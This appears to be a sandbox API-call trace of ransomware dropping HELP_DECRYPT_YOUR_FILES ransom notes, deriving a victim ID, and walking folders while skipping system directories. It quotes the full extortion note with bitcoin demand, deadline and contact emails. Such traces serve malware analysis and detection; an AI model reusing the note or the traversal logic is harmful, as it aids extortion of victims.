	[0166.671] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.671] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.675] CloseHandle (hObject=0x388) returned 1
	[0166.676] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.676] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.676] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0166.678] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.678] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.678] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.678] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.678] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0166.679] CloseHandle (hObject=0x388) returned 1
	[0166.679] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.679] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.680] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.680] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\HELP_DECRYPT_YOUR_FILES.HTML") returned 68
	[0166.680] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.685] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.685] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0166.689] CloseHandle (hObject=0x388) returned 1
	[0166.689] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.690] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.690] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0166.692] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.692] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.692] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.692] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.692] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0166.693] CloseHandle (hObject=0x388) returned 1
	[0166.693] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ce0ed07, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.693] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned 43
	[0166.694] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.694] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*") returned 0x2b
	[0166.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.694] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="windows") returned 0x0
	[0166.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.694] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="boot") returned 0x0
	[0166.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="system volume information") returned 0x0
	[0166.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="temp") returned 0x0
	[0166.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.695] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="program files") returned 0x0
	[0166.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="appdata") returned 0x0
	[0166.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="application data") returned 0x0
	[0166.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.696] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="winnt") returned 0x0
	[0166.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.697] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="tmp") returned 0x0
	[0166.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.697] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="cache") returned 0x0
	[0166.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.697] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="webcache") returned 0x0
	[0166.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="inetcache") returned 0x0
	[0166.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="nvidia") returned 0x0
	[0166.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.698] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="packages") returned 0x0
	[0166.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="cookies") returned 0x0
	[0166.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.699] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\*.*", lpSrch="programdata") returned 0x0
	[0166.699] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.699] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.699] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ce0ed07, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.700] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.700] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce0ed07, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ce0ed07, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ce34f07, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.700] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cde8e1c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cde8e1c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ce0ed07, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.700] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1
	[0166.700] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1
	[0166.700] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1
	[0166.700] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS"
	[0166.700] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\"
	[0166.700] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\", lpString2="MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys"
	[0166.701] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys"
	[0166.701] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\"
	[0166.701] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\"
	[0166.701] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*"
	[0166.701] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.702] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*") returned 55
	[0166.702] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.702] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*") returned 0x37
	[0166.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.702] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="windows") returned 0x0
	[0166.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.702] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="boot") returned 0x0
	[0166.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.703] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="system volume information") returned 0x0
	[0166.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.710] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.710] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="temp") returned 0x0
	[0166.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.710] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="program files") returned 0x0
	[0166.710] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="appdata") returned 0x0
	[0166.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="application data") returned 0x0
	[0166.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="winnt") returned 0x0
	[0166.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="tmp") returned 0x0
	[0166.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="cache") returned 0x0
	[0166.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.712] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="webcache") returned 0x0
	[0166.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="inetcache") returned 0x0
	[0166.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="nvidia") returned 0x0
	[0166.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="packages") returned 0x0
	[0166.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.713] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="cookies") returned 0x0
	[0166.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.714] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\*.*", lpSrch="programdata") returned 0x0
	[0166.714] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.714] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0166.714] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.714] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.715] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys"
	[0166.715] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*"
	[0166.715] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.715] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.715] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.TXT") returned 79
	[0166.716] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.718] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.718] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.722] CloseHandle (hObject=0x390) returned 1
